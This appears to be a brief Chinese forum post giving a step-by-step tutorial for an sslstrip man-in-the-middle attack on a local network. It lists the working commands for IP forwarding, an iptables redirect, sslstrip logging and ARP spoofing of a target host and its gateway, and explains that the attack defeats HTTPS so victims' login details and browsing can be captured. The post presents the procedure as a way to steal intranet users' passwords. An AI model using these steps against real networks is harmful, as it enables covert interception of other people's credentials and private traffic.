利用SSLstrip进行中间人攻击

大家都知在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息。在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了….. 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.

此软件可在(http://www.thoughtcrime.org/software/sslstrip/index.html)找到. E文ok的朋友还可以看他在Black hat上的精彩演讲. 因sslstrip是用python写成,不用安装也可运行.

用法分为以下几步:

1) 用命令 echo “1” > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.

2) 用命令 iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 使iptables把所有http数据导入sslstrip.

3) 运行 sslstrip -a -w ssllog (写入文本)

4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)

接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成. 此文是小弟头一回发贴,有不对之处还请大狭们都指正!

SSLstrip通过监视Http传输进行工作,当用户试图进入加密的https会话时它充当代理。当用户认为安全的会话已经开始事,SSLstrip也通过https连接到安全服务器,所有用户到SSLstrip的连接是http,这就意味着浏览器上“毁灭性的警告”提示已经被阻止,浏览器看起来正常工作,在此期间所有的注册信息都可以轻易被截获。它还可以在浏览器地址栏中显示https的安全锁logo,使得用户更加相信自己访问的安全性。

不清楚能否攻击sslv3(sslv3称可以防止中间人攻击)。